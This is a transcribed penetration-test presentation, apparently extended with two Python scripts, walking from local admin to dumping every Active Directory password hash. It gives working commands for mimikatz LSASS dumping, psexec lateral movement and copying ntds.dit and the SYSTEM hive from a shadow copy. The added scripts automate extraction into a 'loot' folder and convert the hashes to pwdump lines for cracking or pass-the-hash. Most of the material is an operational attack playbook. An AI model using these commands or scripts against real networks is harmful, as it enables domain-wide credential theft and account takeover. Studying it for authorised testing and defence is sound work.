The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES

Riyaz Walikar
Disclaimer
• It was far more painstaking and complicated than this!
• Demo setup to show the execution path
• All the commands were actually used in the pentest
• Please do not try this on your office/corporate environment without written permission
Please exercise caution!
The story so far
• Remote RDP access to a machine on the client network via VPN
• Local Administrator rights, to simulate an employee
• User is a limited domain user
• Domain controller on the same network, reachable, with LDAP services running
Visually. This.
Local Admin eh?
• Locally logged in as TARDIS\fwhite
• Limited domain user, but local admin
• Other users connected? [Task Manager > Users]
• Found another user connected to our system via RDP. Sweet! (possibly a domain admin)
• Need SYSTEM privileges! Any ideas?
Think Sysinternals!
• psexec -s -i cmd.exe
  (-s runs cmd.exe as LocalSystem through the PSEXESVC service, -i puts it on the current interactive desktop; local admin is all this needs, and SYSTEM is the most convenient context for reading LSASS in the next step)
Dump connected user credentials
• mimikatz, by Benjamin Delpy
• Extracts plaintext passwords from LSASS memory
• Wdigest, tspkg, kerberos and many more providers
• Caveat: on Windows 8.1 / Server 2012 R2 and later, and on older hosts with KB2871997 applied and UseLogonCredential set to 0, wdigest no longer keeps the plaintext in memory; the NT hash still comes out, and that is enough for pass-the-hash
• mimikatz
  privilege::debug
  token::elevate
  sekurlsa::logonPasswords
Windows (In)Security?
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
• RDP directly!
• Let's be discreet
• psexec \\10.10.10.1 -u TARDIS\atomboy -s cmd.exe
  (psexec prompts for the password when -p is omitted)
• Game already over!
• Instead, RDP with the captured user credentials and present the report
Let's grab some hashes
• Active Directory stores user objects, password hashes included, in %SystemRoot%\NTDS\ntds.dit (the default location; the path is chosen when the DC is promoted)
• Held open exclusively by the directory service while the DC is running, so a plain copy fails
• ntdsutil snapshot = consistent backup (Windows Server 2008 and later)
• vssadmin create shadow /for=C: (Windows Server 2003 and later)
Let's grab some hashes
• The shadow copy is readable by NT AUTHORITY\SYSTEM and Administrators
• We need ntds.dit and the SYSTEM registry hive: the boot key in SYSTEM unlocks the password encryption key (PEK), and without it the hashes in ntds.dit cannot be decrypted
• cd, dir and the other cmd built-ins do not work on an unmounted volume shadow copy
• copy works! Give it the device path that vssadmin prints, e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit and \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
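The shadow-copy step above, scripted as an added example (this is not code from the deck). It assumes it runs as SYSTEM or a local Administrator on the DC, that vssadmin.exe is present (Windows Server 2003 and later), that ntds.dit is in the default location, and that vssadmin's success message carries a "Shadow Copy Volume Name:" line in the layout shown in SAMPLE_OUTPUT, which is constructed here rather than captured. cmd's built-in cd and dir refuse the \\?\GLOBALROOT device path, but anything that opens files through CreateFile (copy.exe, Python's open()) reads it fine, which is all the script relies on.

```python
"""Copy ntds.dit and the SYSTEM hive out of a fresh volume shadow copy."""
import os
import re
import subprocess
import sys

# Constructed sample of what `vssadmin create shadow /for=C:` prints on
# success (layout assumed from the tool's usual output, not captured).
SAMPLE_OUTPUT = """\
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Successfully created shadow copy for 'C:\\'
    Shadow Copy ID: {9f2b7c44-0f4e-4d2b-8d9b-6a0d6f1e2a11}
    Shadow Copy Volume Name: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3
"""

# The two files needed offline: the directory database and the hive that
# holds the boot key (default paths; ntds.dit can live elsewhere).
TARGETS = (r"Windows\NTDS\ntds.dit", r"Windows\System32\config\SYSTEM")

VOLUME_RE = re.compile(
    r"Shadow Copy Volume Name:\s*"
    r"(\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+)"
)


def shadow_volume(vssadmin_output: str):
    """Return the \\?\GLOBALROOT device path of the new shadow copy, or None."""
    m = VOLUME_RE.search(vssadmin_output)
    return m.group(1) if m else None


def shadow_paths(volume: str, targets=TARGETS) -> list:
    """Full device paths of the files inside the shadow copy."""
    return [volume + "\\" + t for t in targets]


def create_shadow(drive: str = "C:") -> str:
    """Run vssadmin and return the device path of the shadow copy it made."""
    proc = subprocess.run(
        ["vssadmin", "create", "shadow", f"/for={drive}"],
        capture_output=True, text=True, check=True,
    )
    vol = shadow_volume(proc.stdout)
    if vol is None:
        raise RuntimeError("vssadmin did not report a shadow copy volume:\n" + proc.stdout)
    return vol


def copy_out(src: str, dst: str, chunk: int = 1 << 20) -> int:
    """Plain CreateFile-style read/write copy; returns bytes copied."""
    copied = 0
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        while True:
            buf = fin.read(chunk)
            if not buf:
                break
            fout.write(buf)
            copied += len(buf)
    return copied


if __name__ == "__main__":
    # Usage: python grab_ntds.py [output_dir]   (Windows, elevated)
    outdir = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\Temp\loot"
    os.makedirs(outdir, exist_ok=True)
    volume = create_shadow()
    for src in shadow_paths(volume):
        dst = os.path.join(outdir, os.path.basename(src))
        print(f"{src} -> {dst}: {copy_out(src, dst)} bytes")
```

The shadow copy stays behind after the copy; `vssadmin delete shadows /shadow=<Shadow Copy ID>` removes it. The SYSTEM hive can also be exported live with `reg save HKLM\SYSTEM <file>`, which avoids the shadow copy for that one file but not for ntds.dit.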
Core files needed
NTDS.dit structure parse?
• NTDSXtract: a framework for offline forensic analysis of ntds.dit
• Needs the libesedb library as well (ntds.dit is an ESE database)
• libesedb and creddump are bundled in ntds_dump_hash.zip
• wget both to a Linux box (Kali is a good choice)
get framework + compile + make + run
• wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
• wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
• unzip both
get framework + compile + make + run
• cd ntds_dump_hash/libesedb
• ./configure && make
• cd libesedb/esedbtools
• ./esedbexport -l /tmp/ntds.log <ntds.dit>
  (exports every ESE table into <ntds.dit>.export/; the two we need are datatable and link_table)
Yay!
• python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
  (datatable and link_table are the exported files, named datatable.N and link_table.N; <system_file> is the SYSTEM hive copied from the shadow copy)
• Clean up the output into pwdump format with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
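The clean-up step, written out as an added example (my own script, not the deck's ntdstopwdump.py). It assumes the dsusers.py record layout shown in the constructed SAMPLE: a "SAM Account name:" and "SID:" label per record, then one indented name:$NT$hash::: line and an optional name:lmhash::: line under "Password hashes:", with older hashes under "Password history:". It takes the RID from the last component of the SID, fills a missing LM hash with the empty-string LM hash as pwdump consumers expect, keeps history hashes out of the pwdump lines, and flags blank passwords and accounts that still have an LM hash.

```python
"""Convert dsusers.py output (assumed layout) into pwdump lines."""
import re
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Constructed sample in the record layout this script assumes; the hash
# values are the well-known hashes of "password" and of the empty string.
SAMPLE = """\
Record ID:           3567
User name:           Administrator
SAM Account name:    Administrator
SID:                 S-1-5-21-1004336348-1177238915-682003330-500
Password hashes:
\tAdministrator:$NT$8846f7eaee8fb117ad06bdd830b7586c:::
\tAdministrator:e52cac67419a9a224a3b108f3fa6cb6d:::
Password history:
\tAdministrator_history0:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::

Record ID:           3601
User name:           Guest
SAM Account name:    Guest
SID:                 S-1-5-21-1004336348-1177238915-682003330-501
Password hashes:
\tGuest:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::
Password history:

Record ID:           4120
User name:           atomboy
SAM Account name:    atomboy
SID:                 S-1-5-21-1004336348-1177238915-682003330-1108
Password hashes:
\tatomboy:$NT$2b576acbe6bcfda7294d6bd18041b8fe:::
"""

# name:$NT$<32 hex>:::  (NT hash)   or   name:<32 hex>:::  (LM hash)
HASH_LINE = re.compile(
    r"^\s*(?P<name>[^:]+):(?P<nt>\$NT\$)?(?P<hash>[0-9a-fA-F]{32}):::\s*$"
)


@dataclass
class Account:
    sam: str = ""
    sid: str = ""
    nt: str = EMPTY_NT   # pwdump convention when no hash is stored
    lm: str = EMPTY_LM

    @property
    def rid(self) -> int:
        return int(self.sid.rsplit("-", 1)[1])

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def has_lm(self) -> bool:
        return self.lm != EMPTY_LM

    def pwdump(self) -> str:
        return f"{self.sam}:{self.rid}:{self.lm}:{self.nt}:::"


def parse_dsusers(text: str) -> list:
    """Walk the records; only hashes under 'Password hashes:' are current."""
    accounts, cur, section = [], None, None
    for line in text.splitlines():
        if line.startswith("Record ID:"):
            cur, section = Account(), None
            accounts.append(cur)
        elif cur is None:
            continue
        elif line.startswith("SAM Account name:"):
            cur.sam = line.split(":", 1)[1].strip()
        elif line.startswith("SID:"):
            cur.sid = line.split(":", 1)[1].strip()
        elif line.startswith("Password hashes:"):
            section = "current"
        elif line.startswith("Password history:"):
            section = "history"  # old hashes: never written to pwdump lines
        elif section == "current":
            m = HASH_LINE.match(line)
            if m and m.group("nt"):
                cur.nt = m.group("hash").lower()
            elif m:
                cur.lm = m.group("hash").lower()
    return [a for a in accounts if a.sam and a.sid]


def to_pwdump(text: str) -> list:
    return [a.pwdump() for a in parse_dsusers(text)]


def weak_accounts(text: str) -> dict:
    """Blank passwords, and accounts that still carry an LM hash
    (password of at most 14 characters, case-folded, cracked in hours)."""
    accs = parse_dsusers(text)
    return {"blank": [a.sam for a in accs if a.empty_password],
            "lm": [a.sam for a in accs if a.has_lm]}


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    print("\n".join(to_pwdump(data)))
    print(weak_accounts(data), file=sys.stderr)
```

The pwdump lines go straight into john (NT format) or hashcat -m 1000 for cracking, or the NT hash column into WCE for pass-the-hash.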
Now what?

http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!
• Use the Windows Credentials Editor (WCE) from Amplia Security to pass the NT hashes directly; no cracking needed
• Password cracking >> Humla perhaps
References
• http://blog.gentilkiwi.com/mimikatz
• http://www.ampliasecurity.com/research/wcefaq.html
• http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
Thank you

riyazwalikar@gmail.com
http://www.riyazwalikar.com
